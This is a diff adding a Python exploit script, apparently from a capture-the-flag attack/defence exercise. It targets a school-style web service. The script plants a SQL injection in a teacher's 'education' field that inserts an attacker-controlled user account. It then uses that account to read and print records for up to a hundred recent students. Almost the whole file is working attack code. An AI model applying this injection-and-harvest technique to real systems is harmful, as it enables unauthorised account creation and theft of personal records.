init here

sploits/02_sql_no_escape.py

@@ -0,0 +1,38 @@
+#!/usr/bin/env python3
+
+import requests
+import common
+
+injection_first_name = common.random_string()
+injection_last_name = common.random_string()
+injection_password = common.random_string()
+injection_username = f"{injection_first_name}.{injection_last_name}"
+
+legit_first_name = common.random_string()
+legit_last_name = common.random_string()
+legit_password = common.random_string()
+legit_username = f"{legit_first_name}.{legit_last_name}"
+legit_education = (
+    "Pony', ''); INSERT INTO users (first_name, last_name, middle_name, "
+    "username, password) "
+    f"VALUES ('{injection_first_name}', '{injection_last_name}', "
+    f"'Injectionovich', '{injection_username}', "
+    f"'{injection_password}'); --"
+)
+
+common.register_teacher(
+    legit_first_name,
+    legit_last_name,
+    legit_password,
+    legit_username,
+    legit_education,
+)
+
+last_student_id = common.create_student((legit_username, legit_password))
+headers = common.get_auth_headers((injection_username, injection_password))
+
+for student_id in range(max(1, last_student_id - 100), last_student_id):
+    url = f"{common.BASE}/api/students/{student_id}"
+    response = requests.get(url, headers=headers)
+
+    print(response.text)